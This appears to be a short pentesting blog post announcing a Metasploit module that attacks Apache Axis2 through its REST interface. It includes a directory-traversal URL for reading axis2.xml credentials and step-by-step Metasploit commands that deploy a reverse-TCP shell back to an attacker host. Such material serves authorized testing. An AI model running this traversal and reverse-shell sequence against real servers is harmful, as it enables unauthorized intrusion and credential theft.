http://www.focusecurity.org/category/Metasploit
axis2/services/Version?xsd=../conf/axis2.xml
Last weekend at OWASP BASC 2010, I created another version of the Axis2 Deployer exploit which uses REST instead of SOAP. This is important because pentesters may need to exploit Axis2 via REST, since SOAP may be disabled in certain environments. This module will not work against SAP BusinessObjects since the dswsbobje.war module has the REST interface disabled by default. I have tested the module against Axis2 1.5.2.
The REST version of Axis2 Deployer Exploit module can be found here.
In essence this module adds more flexibility for everyone that is a pentesting an environment with Axis2.
Example usage:
use exploit/multi/http/axis2_deployer_rest
set PATH /axis2
set RHOST 192.168.33.128
set payload java/shell/reverse_tcp
set target 0
set LHOST 192.168.33.1
set LPORT 13337
exploit -j
本文介绍了一个新的 Axis2 Deployer Exploit 模块,该模块使用 REST 接口而非 SOAP 进行攻击,增加了渗透测试的灵活性。适用于 Axis2 1.5.2 版本。
1257

被折叠的 条评论
为什么被折叠?



